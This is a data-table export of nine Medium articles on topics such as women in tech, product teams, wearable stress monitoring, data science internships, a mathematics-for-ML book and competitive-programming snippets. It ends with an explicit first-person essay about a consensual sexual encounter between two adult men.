Unnamed: 0 (int64, 0-3k) | title (stringlengths 4-200) | text (stringlengths 21-100k) | url (stringlengths 45-535) | authors (stringlengths 2-56) | timestamp (stringlengths 19-32) | tags (stringlengths 14-131) |
---|---|---|---|---|---|---|
100 | Corgi — Undergraduate Women in Tech: Reflecting on Our 1st Year | To officially launch Corgi, we collaborated with Women Who Code Belfast and SmashFly, a local software company, to create an event featuring 3 awesome artificial intelligence talks, combined with the creative world of nail art. Attendees were encouraged to relax and paint their nails whilst listening to our AI speakers, leaving the meet-up with new knowledge, friends and a dazzling set of nails!
We asked attendees what they enjoyed about the launch, and it’s safe to say the feedback speaks for itself:
“The atmosphere and friendliness of all attendees and organisers”
“Love all the talks and the general atmosphere”
“Fun atmosphere”
“Everything!”
“Great talks, interesting people and not afraid to do “girly” activities while also talking tech. Also great food!”
Winter Warmer — Social Coffee Meet-up
By this stage, we had somewhat established our place in NI as a meet-up group, and aimed to stay consistent with our platforms and events. 2019 concluded with our Winter Warmer: a festive community meet-up to enjoy chill chats, cosy coffee, festive food and a stroll around Belfast Christmas Market.
My cravings for those churros will have to wait until 2021, as the market won’t be open this year! 😭
#MondayMotivateHER
We created a social media campaign called #MondayMotivateHER to inspire and uplift Monday morning spirits by featuring local and worldwide women in tech, applauding them for their successes and generating visibility for all the fantastic women. These are a mixture of crowd-sourced and committee-written testimonials; submit your own message of kindness to a friend or colleague here!
Here are some snippets of my favourite quotes over the past year:
Chloe McAteer: “Because of Chloe’s amazing teaching and support, I have been able to take part in AI based events and get opportunities which would not be available to me without what she provided me with. I’m so thankful for all of the educational and general support she has given me over the past year!” ~ Ceilidh Davison
Amy Gardiner: “Amy motivates me with her “can-do” attitude, her extremely positive outlook on life and her honest approaches on her work which made me feel more comfortable in my own role. She’s an extremely supportive person and is always willing to provide emotional support when I have moments of self-doubt about my abilities. Thank you Amy for always being so cheerful and motivating me to do the best I can do!” ~ Niamh Duffy
Niamh Cassidy: “I admire Niamh because of her optimism and drive to succeed. When our entire Android team was down in the dumps during one of our many 12-hour coding sessions, she was able to keep up morale and have us all ticking along with jokes and encouragement.” ~ Cameron Thompson
Lauren Taylor (FYI I almost cried when I read this): “Lauren is a natural-born leader with an ability to bring people together. She doesn’t rest and consistently seeks to improve, learn and help others. If there is an opportunity to be had, you can rest assured she’ll go for it. I am privileged to know Lauren and she’s most definitely an inspiration to me. I have no doubt that she will go on to do great things!” ~ Raymond Dillon (Cheers, son’s crying 😭❤️)
COVID Disruptions
After working our way through the lull that is January exams, we had 3 exciting events in the works, until we didn’t.
Like everyone else on the planet, we were struck by Covid-19, and all our plans were put on pause. After a few months of uncertainty, it became clear this was not going to be a short-lived period. To overcome this, we pivoted to online events, and went ahead with our first event, Careers in Tech!
Careers in Tech
This was a collaboration with Women Who Code Belfast, featuring a panel of 5 inspiring women in the industry, highlighting the different disciplines available, regardless of your background. This included a Software Engineer, Games Producer, Senior Venture Designer, Data Science Research Associate and Product Manager.
Despite the disruptions, the event went down brilliantly with the community:
“I can honestly say this evening’s event was one of my favourite events to date — our panel of speakers were all so insightful, inspiring, and wholesome. There were so many great nuggets of wisdom” ~ Mary-Jane
The New Academic Year — Freshers’ 2020
To pop off the new academic year with a bang, we teamed up with Kainos for our Freshers campaign. This involved a Freshers Quiz (who doesn’t want £100 worth of Amazon vouchers to replace those scratched-up pots and pans?), alongside a social media competition to win a stunning pink and white mechanical keyboard and mouse worth £140 (WFH setup goals).
As the weeks of social distancing and lockdowns dragged on, we realised how much we valued social contact with each other. It made me think about how I felt being on my own in London, and the importance of having that sense of community. So, we decided to bring the community online, and created a Discord server where anyone can hop in, chat, share resources and play impromptu games of Among Us!
Join our Discord here! ✨
Corgi Committee Applications Now Open!
That’s all of Corgi’s events up until today! We’re growing strong, and hope to continue hosting events over the next year to bring people together and provide a fun support network.
If you resonate with the Corgi community, want to inspire others, organise events, learn new skills in communication, planning and teamwork and network with local leaders and companies — Apply to be on our committee!
I’ve had an incredibly rewarding time building Corgi from the ground up, and I’ll be sad to say goodbye as I graduate into the working world. That said, I’m super proud of the women behind the 2020/21 committee, and their ability to adapt and lead the community towards bigger and better opportunities! I would have loved to join Corgi as a nervous undergraduate first year, so I’m super grateful knowing it’s fallen into good hands and has a promising future that’ll only bring more joy into more people’s lives, and provide students with the sense of belonging and support they deserve!
Applications close: Monday 2nd Nov, Midnight.
Please share this post with anyone you think would enjoy being on this year’s committee! Lastly, thank you for reading ❤️
Corgi Platforms | https://medium.com/@laurentaylor1/corgi-undergraduate-women-in-tech-reflecting-on-our-1st-year-84211c140227 | ['Lauren Taylor'] | 2020-10-26 22:08:10.965000+00:00 | ['Community Development', 'Students', 'Women In Tech', 'Diversity In Tech', 'Technology'] |
101 | Building Great Product Teams: Notes From the Underground | Building Great Product Teams: Notes From the Underground
Great product teams make great products. They’re not your average teams.
I’ve been a part of phenomenal teams and I’ve been a part of teams that have had many, many opportunities. I’ve been on teams navigating a now failed startup, on ones jet-setting and consulting globally for high profile clients (hello late-night coffee journeys in Zurich!), and most recently, on ones embedded within a very large organization.
I’ll start with the obvious and non-bleeding edge: a team and its products form a mini-ecosystem. (I swear, it gets better than this.)
One of my favorite human-made ecosystems 👏🏽
This doesn’t mean there are A players and B players, and we certainly shouldn’t subscribe to the idea that there can’t be many star players on a team; it’s outside of that framework. No one is starting and no one is benched. What this means is that everyone has a wealth of skillsets they bring to the team to bring something to life. And they’re all interconnected. The most high-level way we start to do this is the concept of roles. Someone codes, someone tests, someone user-researches, someone designs, someone storytells, and so on. It’s an easy way to create a team formula. And it’s not a bad start. It’s digestible, actionable, and most of the tech industry is ok with it. Because it works well, to an extent.
But the foundational aspect here is it simply creates a product team, a working, functional team — not necessarily a great team.
Great product teams are built with grit. It definitely starts with the individuals, and includes both role-based skills and other skills, but there are qualities at the team level we should be nurturing.
Note 1: a great product team has a goal
Whatever color Kool-Aid or level of fidelity this may be, it has to exist. And you have to all be there for it.
Some of the best teams I’ve been on have had the clearest goals, whether it’s — and here are some fuzzy examples — to get something to market in the next eight weeks, to improve best product practices for a client, to move to continuous delivery, to increase conversion by 4%, and so on. This doesn’t mean everyone won’t have their own goals, and I think it’s healthy and necessary everyone does because these are shorter-term motivators and bring us additional joy and satisfaction in our work. Maybe someone wants to learn a new and emerging language or testing framework, or someone else wants to improve their storytelling or public speaking. All ok. But the thread that ties everyone together to make a group of people a team, is the overarching goal.
Designed by Lillen.
And what makes a great product team in this regard, is that the “great” differentiator can start to emerge when everyone on the team is actually bought into the same goal. Otherwise it’s just a group of people working on a set of features perhaps peripherally related to a slide someone presented in a leadership meeting a while ago.
Note 2: a great product team is empowered
The team holistically has the skillsets, accountability, ownership, and tools or means to achieve their goal. Often with lots of creativity.
On all product teams, teams build features and own getting a solution out into production. Check. Not writing home about this.
On great product teams, teams own the problems, the prioritization of those problems, and the solution. Which means they’re empowered to 1) choose which problems to solve, and 2) solve the problems however they want to.
This gives rise to a few valuable non-role specific skillsets to look out for when building a great product team. I’ve personally found that high levels of curiosity, ability to effectively navigate ambiguity, ability to make decisions without all the information, and an understanding of short and long-term tradeoffs are some of the most critical ones to help a team thrive and become empowered. (Let’s assume an organization has not already disempowered a product team; this is really another discussion on product leadership.)
When building out my own teams, a common interview question I will almost always ask is some form of “What are you most excited to learn or take on in the next year that you don’t know how to do now?” Occasionally you get a downer response of “oh, putting into practice what I’ve learned…” But if you’re wanting to build a great product team, this response won’t cut it. When I asked one of the best hires I’ve ever made this question, her face lit up. She rattled off a list of all the things she wanted to do that she hadn’t done yet, what she wanted to learn, and where she wanted to go. The light was fully on. And that indicates to me two distinct qualities: that she is curious as hell, and that she has a solid understanding of what she knows and what she doesn’t and where that universe of growth is waiting for her. It’s one of the most exciting things to see when building a great product team.
People with these qualities drive a team to shift from simply delivering to delivering the right thing. And that’s a requirement of great product teams.
Note 3: a great product team embodies a set of *desirable* values
Values exist, and everyone on the team shares them. And they use those values to achieve their goal given they are empowered to do so, in a way that feels right to them.
A product team’s values could be transparency, integrity, collaboration, bringing your authentic self to work and allowing others to do the same, challenging ideas and not people, and so much more. We may all have different ways of manifesting these but our values need to be aligned. Granted you can have teams that share somewhat undesirable values, but let’s assume we’re shooting for the stars here.
I’ve really found this to be team-critical, and another huge differentiator between an average team and a great product team. Fluffy as it may be, IMO shared values are the most important thing in building great product teams. A difference in values is a complete crack in the boat. Think about your own team: Does someone value predictability? Moving up the company ladder? Calling out when the team isn’t building the right thing? Always being right? Taking time to upskill someone else on the team? What does the team value as a whole? All these values and manifestations of values create culture. The culture we nurture by doing, the culture we allow to thrive by not doing. (If this is not clear from, oh, let’s say life, then yes, inaction has an impact just like action.) Thus, everyone owns their own culture-add.
I’ve been a part of teams that have shared values and it’s been unstoppable. (You know who you are!) I’ve also been a part of teams that did not share a set of desired values and wow, what a showstopper. Talk about non-thriving. The teams were empowered to… barely keep our heads above water.
We need to value creating a safe space for everyone to challenge everything (let the best idea win!), and to allow people to bring their full, authentic selves to the team.
When you’re looking to build a great product team, focus on the values a person brings and how it will affect the overall set of values the team embodies. Skill sets can be complementary but values should be aligned. Given a desirable set of values, it could even move beyond a great team to ensure your team is built in a way that it will continue to grow and the products will grow with it. Instead of reinforcing the same norms and predictable feedback loops through an outdated culture-fit, teams anchored in shared values will be able to grow and produce a few years from now in a way they never even imagined was possible today. And that’s exciting. These mini ecosystems of teams are breathing, growing things.
And to wrap it up, team values were described to me the other day by a partner at a VC firm as “enough of both collaboration and contradiction to make a pearl.” Brilliant.
Thanks for reading. | https://medium.com/swlh/building-great-product-teams-notes-from-the-underground-152ff6aeddc7 | ['Lauren Barrett'] | 2020-12-16 21:54:49.128000+00:00 | ['Technology', 'Startup', 'Software Development', 'Product Management', 'Teamwork'] |
102 | When it comes to engagement, nothing beats videos and live-streams. | When it comes to engagement, nothing beats videos and live-streams.
When I was done with a 4-hour Live-Stream this morning, I was pumped. The viewership and real-time engagement were the highest I encountered in 2020.
Photo by Nathan Dumlao on Unsplash.
The 4-hour Live-Stream was split into “Yesterday”/“Today”/“Tomorrow” to commemorate our 2020 journey.
I shot a video while performing backstage support for the segment on “Tomorrow”, explaining how backstage works to the YouTube audience.
I will be contributing one story to Technology Hits on “How To Live-Stream” (Tentative title!). For now, please enjoy the YouTube video and the story on the videos attached! | https://medium.com/technology-hits/when-it-comes-to-engagement-nothing-beats-videos-and-live-streams-f5aaa8c57a04 | ['Aldric Chen'] | 2020-12-17 11:15:43.193000+00:00 | ['Digital Marketing', 'Engagement', 'Videos', 'Livestream', 'Technology'] |
103 | diconium Talks Futures: How we can shape our future today | New technologies emerge so fast that it becomes harder to predict what our future will look like. That’s why we explored possible features along with our guest at the 25 year anniversary of diconium. Our guest list included Pascal Finette, Joana Breidenbach, Dame Stephanie Shirley and many more.
The Hype Cycle for Emerging Technologies by Gartner is one of the most prominent examples of future prediction. It shows the life stages of certain technologies, from conception all the way to widespread adoption. Such graphics offer a great overview, but they lack complexity. The future doesn’t just happen; it’s something we can actively shape and need to discuss in order to understand all its dimensions.
At our 25-year anniversary, we tried exactly that. At diconium Talks Futures we covered three main topics: mobility, e-commerce, and sustainability, looking into the implications and possible scenarios for our future. These topics are not only defining topics of our time but also interconnected, as we explored during the sessions. We invited more than ten bright minds to join us in celebrating and to share their beliefs, hopes and predictions for the future with us.
We also recorded one episode of our podcast REWRITE TECH to collect the highlights of the three-day event along with our hosts Geraldine de Bastion and Brad Richards.
How can we keep pace with the new challenges of mobility?
The first automobile was invented more than 100 years ago and relatively quickly cars became widely accessible. Today cars are omnipresent in almost every part of the world, but we’re in the midst of a paradigm shift. With the introduction of software into cars, the mobility landscape will drastically change and needs to redefine itself.
One of our first guests covering these topics was Christoph Hartung, Executive Vice President at Bosch Connected Mobility Solutions. He talked about how software will change how cars work and the increasing complexity. We’re still at a point, where the industry needs to learn how to deal with those new challenges as he outlines.
“A really tricky part, that will challenge us in the future, is cybersecurity.” — Prof. Dr. Michael Resch
Adding to that, Prof. Dr. Michael Resch, Director of the High-Performance Computing Center, highlighted that the development of connected services requires a deeper understanding of cybersecurity. He elaborated on an example of remote flying and why such ideas are quickly discarded.
How can we innovate in the future?
When diconium started 25 years ago, among the first clients were Neckermann and Quelle, two German catalogue mail-order companies. Since then, retail has massively evolved. Nowadays, diconium builds complex webshops and the industry talks about things like contextual commerce.
But what is the next step for commerce? Being innovative is essential when you want to stay in business. It means that you must see business opportunities before your competitors do. According to Pascal Finette, co-founder of the be radical consultancy, the key to that is to identify weak signals, the early stages of exponential growth, as he explains during his session. When companies learn how to detect and understand those early signs, they are able to thrive.
“One of the major differentiations I make in the innovation field is between bullshit innovations and innovations that are meaningful. Bullshit innovations harm our society or environment or they don’t add anything new significantly.” — Joana Breidenbach
Still, companies shouldn’t innovate for the sake of innovation, says Joana Breidenbach, who is the co-founder of betterplace.org. She calls out “bullshit innovation” as meaningless strategies, but also gives concrete tips on how teams need to develop in order to make a real difference in the world.
How can we integrate sustainability as a core principle?
Innovation and future-building become even more complicated when we put sustainability into the mix. Building environmentally friendly solutions should be at the core of our work. We certainly need innovative ideas, but they shouldn’t be too innovative, argues Matthew Manos, who owns the design strategy practice verynice. People need to get used to new developments, and sometimes middle-ground innovations help. One good example is hybrid vehicles, which pave the way for electric mobility.
“If you wanna envision and realise a more sustainable future, don’t be too innovative” — Matthew Manos.
We had so many more great guests on our stage, that it becomes hard to pick a favourite. We summed up some of the most interesting statements our guests made in our podcast REWRITE TECH. You can find it on all major listening platforms including Apple Podcasts and Spotify.
You can also still request the recording of the three-day event on the diconium website.
________________________________________________________________
Learn more about REWRITE TECH. | https://medium.com/rewrite-tech/diconium-talks-futures-how-we-can-shape-our-future-today-814848168b19 | ['Sarah Schulze Darup'] | 2020-11-23 15:53:46.878000+00:00 | ['Events', 'Future', 'Technology', 'Podcast', 'Futurology'] |
104 | How A Small Device Can Help Monitor and Reduce Stress | Occupational stress and burnout are major issues that our society faces today. One up and coming intervention for this stress comes in the form of new technology. The past decade brought a surge in companies that develop wearable technology to help improve consumer health. This includes increasing accessibility to devices that help users better manage their stress.
There is a lot of value in having a good, widespread way to evaluate the experience of stress. Understanding when you are experiencing stress allows a more precise determination of the stress’s cause.
One concept that is widely used in the devices to help consumers reduce their stress is biofeedback. Biofeedback describes the process by which you can impact your biological outputs, like respiratory effort and heart rate variability. Wearing a health monitoring device (like an Apple Watch) allows the user to be more in tune with their biological outputs. This knowledge, in combination with techniques taught for stress management, allows the user to reduce their physiological stress reaction in real-time. Biofeedback is discussed in much more detail in another article on our blog, “A Biofeedback Hack: Controlling Stress through Resonant Breathing” by Johanna Bergstrom. Here you can find more information about incorporating this technique as a stress management technique in your life.
Devices that Track Respiratory Effort
One physiological measure that wearable health devices can compute is respiratory effort. This includes measures of the number of breaths taken per minute. It is a cool area for biofeedback intervention because breathing can be voluntary, which allows for direct intervention.
A recent study done by Stanford University used a new wearable technology from Spire Health to track stress. This study used the Spire Stone device and its accompanying application to track respiratory effort as a measure of stress.¹ The experimental protocol included different aspects of wearing a device, and these facets helped reduce the negative impacts of stress. The researchers discussed the significance of wearing the device as a reminder of the stress reduction program, as well as the motivation of having readily available biofeedback information. There was also a mindfulness stress reduction program incorporated in the application associated with the device.²
The findings of the study were significant. Participants using the device for four weeks reported experiencing fewer negative impacts of stress and fewer stress-related symptoms.³ They also reported fewer days on which they felt stressed or anxious when compared with a group that did not complete the same stress management program.⁴
Illustration by Nadia Mokadem
Devices that Track Heart Rate Variability
Technologies that measure heart rate variability are also viable options for wearable technologies that can monitor stress. Heart rate variability is a measure of the variation of time between heartbeats.⁵ It is a non-invasive technique for measuring physiological responses associated with stress.⁶ Its use and value as a clinical marker are discussed in detail in an earlier post on our blog. For more information on heart rate variability, “Why You Need to Measure Heart Rate Variability?” by Johanna Bergstrom is a great resource.
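To make that definition concrete, HRV is commonly summarized from a series of RR intervals (the times between consecutive heartbeats) using simple statistics such as SDNN and RMSSD. The Python sketch below is a hypothetical illustration of those two formulas; it is not the algorithm any particular wearable uses, and the sample intervals are invented:

```python
import math

def sdnn(rr_ms):
    """Standard deviation of RR intervals (SDNN), a common HRV summary."""
    mean = sum(rr_ms) / len(rr_ms)
    return math.sqrt(sum((x - mean) ** 2 for x in rr_ms) / len(rr_ms))

def rmssd(rr_ms):
    """Root mean square of successive differences between RR intervals (RMSSD)."""
    diffs = [b - a for a, b in zip(rr_ms, rr_ms[1:])]
    return math.sqrt(sum(d ** 2 for d in diffs) / len(diffs))

# Invented RR intervals (in milliseconds) from a resting recording
rr = [812, 798, 840, 825, 810, 795, 830]
print(f"SDNN: {sdnn(rr):.1f} ms, RMSSD: {rmssd(rr):.1f} ms")
```

Persistently lower values of measures like RMSSD are often interpreted as a sign of higher physiological stress, which is part of what makes HRV attractive as a stress marker.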
Recent studies demonstrate the value of heart rate variability, especially as a tool to monitor and reduce reported stress levels.⁷ These studies discuss how the understanding of your heart rate variability from wearable health devices in combination with biofeedback techniques can help reduce the levels of stress experienced.
One study tested heart rate variability against other physiological markers of stress. These researchers found that it is a promising tool that can be easily measured by a wide variety of wearable devices readily available to consumers.⁸ A particularly interesting finding is the difference in the reported stress level of the participants and the measured stress level. Researchers studying the use of heart rate variability as a marker of stress found that participants reported lower levels of stress than their heart rate variability monitoring suggested.⁹ One possible implication of this finding is that people are not in touch with the level of stress that their body is experiencing.¹⁰
There are many tangible incentives for employers to start implementing these devices as tools to help their employees better manage their stress levels. Research suggests that occupational stress and burnout account for between 5% and 8% of annual healthcare spending in the United States.¹¹ It also discusses how the negative impact of stress on employee productivity could be costing businesses enormous amounts of revenue each year.¹² Helping employees reduce their stress by implementing stress management programs would be beneficial to all involved parties. Research even suggests these programs can help to decrease absences and increase employee productivity.
Many wearable health devices are available on the market, in a wide price range, for consumers to purchase. There is one out there for you if you are interested in trying a stress management program with the biofeedback from a wearable health device.
References | https://medium.com/x-factors-in-life/how-a-small-device-can-help-monitor-and-reduce-stress-f00736cca56c | ['Emilia Lambert'] | 2020-12-03 21:17:47.374000+00:00 | ['Stress', 'Biofeedback', 'Technology', 'Burnout'] |
105 | 10 Remote 2021/2022 Data Science Internships You Should Apply to If You’re a Student | 10 Remote 2021/2022 Data Science Internships You Should Apply to If You’re a Student
Photo by Sung Shin on Unsplash
As a student who has been in school almost my entire life, I always felt that the knowledge we learn in school is theoretical. That feeling only grew whenever I talked to my friends and colleagues who worked in the industry or had some experience outside the university. This gap between what we learn in our degrees and what we actually need to succeed and build a career is one of the reasons internships are necessary for any student.
Although internships are important for basically any student regardless of their major, it’s even more important if you’re a student in a tech field. In tech, we study the history of a field, the tools we can use, and some field applications. But, university classes are never enough to build a real-life experience that will help you launch a career once you graduate.
Here, internships make a difference, not just by helping students gain experience and know what to expect when they get a job after graduation; they also help them decide what career they want to pursue after obtaining their degree. So, if you’re a student, undergrad or post-grad, getting an internship will definitely change the way you view your field and help you get a job later.
In September of every year, companies worldwide open up the applications for the following year’s summer. So, today, I will walk you through 10 remote internship opportunities for the 2021 fall or 2022 summer that you can apply for now.
№1: Quora Software Engineer — Machine Learning Intern 2022
First on our list is a machine learning internship offered by Quora. In this internship, you will be working on improving Quora’s existing machine learning systems, improving the user experience, and working with other machine learning engineers to implement different algorithms and systems efficiently. To apply for this internship, you need to be a student who knows the basics of machine learning and experience with Python or C++.
№2: Moyyn Machine learning | AI Internship
Next up is a 3- or 6-month machine learning and AI internship offered by Moyyn. Moyyn is a recruitment platform based in Germany that focuses on automating the matchmaking of candidates and companies. This internship will have you working on the platform’s algorithm, as well as testing and optimizing it. To apply for this internship, you need to be a student and know the basics of NLP, machine learning, and AI.
№3: IBM Data Science and Engineering Internship
Next up is a data science internship offered by IBM. This remote opportunity is available for students across Europe or the US, with the chance for international applicants. To apply for this internship, you need to have intermediate Python skills and knowledge of NLP, have a solid foundation of data structures, and be fluent in English.
№4: Woohoo Machine Learning Internship
Woohoo in Singapore offers this remote internship for students with an MS in computer science and knowledge of distributed systems and software engineering. You also need to have experience building, maintaining, and extending web-scale production systems, and know how to perform A/B testing and apply machine learning algorithms.
№5: Workiva Data Science Internship
Workiva offers a remote internship to anyone residing in the US or holding a US work permit. During this internship, you will participate in discovery, data gathering, and exploratory data analysis, and help the machine learning engineers design, develop, and optimize their data pipelines and test large-scale models.
№6: HackerRank Software Engineer Internship
Next up is s remote internship from HackerRank if you reside in India. If you love to write code and connect with other developers and engineers worldwide, then this is the internship for you. To apply for this internship, you will need to solve 3 test challenges and submit your resume; that is it.
№7: Snackpass Data Science Internship
Snackpass, an ordering and dine-in app based in the US, offers this remote internship where you can help answer important business questions for promoting restaurants, design and build machine learning models for hundreds of users, and test and optimize these models for different use cases.
№8: 1QBit Machine Learning Researcher Internship
If you’re into machine learning and curious about quantum computing, then this internship by 1QBit is ideal for you. This 8 months remote internship will allow you to utilize your machine learning background to address challenging industry problems on both quantum and classical sides and leverage your knowledge to develop new tools and computing capabilities.
№9: Shopify Data Science Internship
Shopify is making opening your own business as easy as buying a product online. Shopify offers an internship where you can build machine learning models that enhance Shopify’s intelligence and help people make better decisions about their business. You will also get the chance to contribute to the open-source community and make lasting connections.
№10: VidMob Data Science/ ML Internship
Next up is a data science and machine learning internship by VidMob, where you can apply your expertise in quantitative analysis, machine learning, and data visualization to real-life problems. You can also analyze the results of different models to better understand and improve their performance.
Takeaways
No matter what degree you go to school for, there is always a gap between what we learn at university and what we will actually do after we graduate and start looking for jobs. Not just that, but often, after we graduate and start going through the job-hunting nightmare — you had better start it before you graduate, though — we realize that we don’t even have the experience needed for an entry-level position.
Thankfully, we can gain the experience we need and make some money in the process by obtaining an internship at a company. Most companies open up internships during the summer vacation, and applications for these internships open during the fall of the year before. So, basically, now is the ideal time to start looking and applying for next year’s summer internships.
Since COVID hit, all aspects of our lives have been disrupted, including the chance to apply for internships abroad. Because of that, however, many companies are now offering remote internships, with the possibility of making them in-person if things get a little better before next summer.
In this article, I proposed 10 internships for this fall or next summer that you can apply for today to gain the experience you need to land the job you want after you graduate. Good luck… | https://towardsdatascience.com/10-remote-2021-2022-data-science-internships-you-should-apply-to-if-youre-a-student-b2c4e3c9ad6d | ['Sara A. Metwalli'] | 2021-09-12 16:56:40.778000+00:00 | ['Women In Tech', 'Students', 'Data Science', 'Careers', 'Technology'] |
106 | Mathematics for Machine Learning | Mathematics for Machine Learning
An online book that provides foundational knowledge about the mathematics behind machine learning concepts.
A new online resource appeared this week which gained much attention on Twitter. Just take a look at the engagement below:
Not every day does a resource like this come along; in fact, this project, according to the authors, took roughly two years to complete. I thought it was a good idea to share it with our community. This will be archived under the “Learn” tab of this publication, which is intended to highlight useful educational resources and material for learning about concepts related to machine learning, artificial intelligence, natural language processing, and deep learning.
The resource I am referring to is the online book called “Mathematics for Machine Learning” by Marc Peter Deisenroth, A Aldo Faisal, and Cheng Soon Ong. I share this book here because it’s free and it contains a great introduction to the mathematics behind some of the most pervasive machine learning techniques. Some concepts include Analytic Geometry, Vector Calculus, and Continuous Optimization, among others. The summarized table of contents looks as follows:
If you ever need a place to start learning about the maths behind machine learning, then this is a highly recommended book.
Besides the book itself, the open project also provides easy-to-follow Python notebooks that include code walkthroughs of concepts like Maximum Likelihood and PCA, which are all important techniques in machine learning. | https://medium.com/dair-ai/mathematics-for-machine-learning-bbbaa5fb1c06 | [] | 2019-08-23 17:42:15.456000+00:00 | ['Machine Learning', 'Technology', 'Artificial Intelligence', 'Data Science', 'Deep Learning'] |
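As a taste of what those notebooks cover, PCA can be sketched in a few lines via an eigendecomposition of the sample covariance. This is a generic illustration, not code taken from the book’s notebooks:

```python
import numpy as np

rng = np.random.default_rng(0)
# 200 correlated 2-D points (a toy dataset for the example)
X = rng.normal(size=(200, 2)) @ np.array([[3.0, 0.0], [1.0, 0.5]])

Xc = X - X.mean(axis=0)                 # center the data
cov = Xc.T @ Xc / (len(Xc) - 1)         # sample covariance matrix
eigvals, eigvecs = np.linalg.eigh(cov)  # eigenvalues in ascending order
top = eigvecs[:, -1]                    # first principal component
projected = Xc @ top                    # 1-D representation of the data
print(projected.shape)                  # (200,)
```

The variance of the projected data equals the largest eigenvalue, which is exactly the property PCA exploits.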
107 | How to speed up your Competitive Programming? | Snippets
Doing a Breadth-First Search on a tree and executing in less than 25 seconds
If you don’t know what snippets are: “A snippet is a programming term for a small region of re-usable source code,” and many modern text editors like Sublime provide functionality to automatically write a predefined snippet when you type a keyword.
I cannot emphasize enough how much one can speed up their implementation by using snippets. So whether you need to do a Breadth-First or Depth-First Search, use a Segment Tree, or do Matrix Exponentiation, you are just a (Keyword+Tab) away from its code.
It will not only improve your speed but, in turn, allow you to quickly try multiple approaches and switch between them whenever necessary without losing much time.
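For instance, a breadth-first-search helper of the kind shown in the caption above is a classic snippet candidate. Here is a minimal sketch in Python (my own illustration; competitive programmers often keep a C++ equivalent):

```python
from collections import deque

def bfs(adj, src):
    """Breadth-first search over an adjacency list.
    Returns a dict mapping each reachable node to its distance from src."""
    dist = {src: 0}
    queue = deque([src])
    while queue:
        u = queue.popleft()
        for v in adj[u]:
            if v not in dist:       # first visit = shortest distance
                dist[v] = dist[u] + 1
                queue.append(v)
    return dist

adj = {1: [2, 3], 2: [1, 4], 3: [1], 4: [2]}
print(bfs(adj, 1))  # {1: 0, 2: 1, 3: 1, 4: 2}
```

Stored as a snippet, this becomes a keyword-plus-Tab away whenever a problem calls for shortest paths on an unweighted graph.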
How to Add a Snippet
Adding a snippet in Sublime Text is pretty straightforward. Just navigate to Tools > Developer > New Snippet.
Base Template for Starting a Snippet
Use this as your base template for a snippet, and paste the code that you want to use into it, replacing the comment and the trigger keyword.
Example: A Completed Snippet of a Fenwick Tree
I like to use snippets a lot, and the hardest part of using them is making them before you need them. So to ease things for you, I have created a GitHub repository with some of my most-used snippets and relevant instructions. Feel free to use them and consider contributing.
108 | In Bed with a Hard-Bodied Tech Bro | His kink was new to me
In Bed with a Hard-Bodied Tech Bro
He was almost forty years younger
Photo by Allef Vinicius on Unsplash
I’ve been shocked to find how many men in their twenties and thirties think it’s cool to hook up with a guy in his sixties. Being able to look at and being given permission to touch their bodies is more electric for me now than it was when I was their age. My hand on their flat bellies shocks me into relishing the future.
So last year I met a new guy via an online app. He’s 27 years old and was born in Beijing. He has a job in information technology. He travels a lot for work. He’s shorter than me. He has a hard body from running along the river in the town where we both live. He has this kink. He wants an older guy to wear dress socks and dress shoes and nothing else. He made that a condition of our meeting up. I’d never encountered this before and found it a little funny, but whatever it took to be with a hot 27-year-old runner was okay with me.
He came over to my place. I could see him getting out of his ride share down in the street. Open-faced and a little nerdy looking. A tech bro. Very friendly in person. We shook hands and smiled at one another. I gave him a tour of my apartment.
He was over-anxious about our being discovered. He wanted all the shades down and to be reassured that no one would hear us. He wanted tape over the computer camera. He checked and re-checked this. I wondered whether this had anything to do with growing up in China where the state has large powers of surveillance. Or, maybe he just wanted to make sure I wasn’t filming him?
We sat on the sofa and had a short conversation about our lives and work. I asked him if I could kiss him. He agreed. Soon, while we were fully clothed, I got him lying flat and climbed on top of him. He whimpered. I knew then that he liked my weight pressing him down.
After a while, I asked him to get up and strip for me while I continued sitting on the sofa. He liked the command. I’m not used to ordering people around, but I had an instinct about him. He took the order docilely. I was still fully clothed. I was wearing the dress shoes and socks he wanted. He crossed the room and pulled off his tee shirt. Then he stepped out of his running shorts. There was a big wet spot from pre-cum on his black undershorts. He shucked these off to reveal a full hard-on and dark pubic hair. If that wasn’t a moment of glory, I don’t know what is.
Next, I commanded him to come and straddle my knees and thighs, facing me. I stroked his dick while he faced toward me, watching me. We kissed occasionally. His wet cock bobbed in the space between us. It was fantastic. It made me feel giddy.
We ended up on the bed in my bedroom, him fully nude, me naked except for the dress shoes and the socks. We jerked each other on our backs. We tried belly to belly and rubbing our dicks together.
When I put a finger on top of his asshole and tapped it a little, he was uncomfortable. I knew from his earlier whimper he would probably like it. But some extreme caution on his part re-asserted itself. I continued tapping him a few times. He scooted away and told me to stop. Then he relented. He asked me to put a condom on my finger before sliding it with some lube up his bottom.
He loved this. His voice went from a gentle tenor to a deep bass. He made inarticulate noises that could’ve been a nightmare if I hadn’t been so sure they were pleasure. He spread his legs and opened wide. He gave me everything he had. I kissed him then and, though we didn’t know each other, I had a profound feeling of being for a moment one with him. My lips were on his, our tongues intertwined. My finger was deep in his ass and he was groaning. It was as if we were speaking to each other without words. It was what human life is all about. It was what we were meant to do.
He ended up coming when I put my feet, in socks, on his penis and rubbed him there. He clasped my feet together with his hands so he could get friction in the right places. He came all over my socks, which were a sticky mess. It was a turn-on to watch him do it.
He then lay patiently by my side and waited for me to come. He didn’t mind my playing with his soft dick while I was doing it. His dick hard was a respectable five or six inches. Soft it was no bigger than a schoolboy’s. I thought he’d be totally worn out and ready to go by the time I came (really it probably only took about 20 minutes). No, when I was done, he decided to go again himself and came a second time (in about 5 minutes).
When he got dressed to go, he asked whether he’d done everything I wanted. Had he been taught at work to go through an evaluation with the client after every time he’d given a presentation? Was it what I expected? How could it be improved? I said it was wonderful and nothing could have been better. I thanked him. He didn’t mind my taking one last quick feel of his hard stomach. He didn’t mind my putting my hand in between his legs, where I felt him start to get hard all over again. He called his ride share on his cellphone and he was off. I did see him one more time.
His subservience was what surprised me the most. I’ve always felt that equality was a necessary ingredient of good sex, but this young Chinese guy’s willingness to please me, his obedience, was a newer and stranger turn-on than the difference in our ages. I found myself looking forward to the next time I could spread his legs. He would avert his eyes, put his arm up to shield his face, as if he were embarrassed at the control he wanted me to have over him.
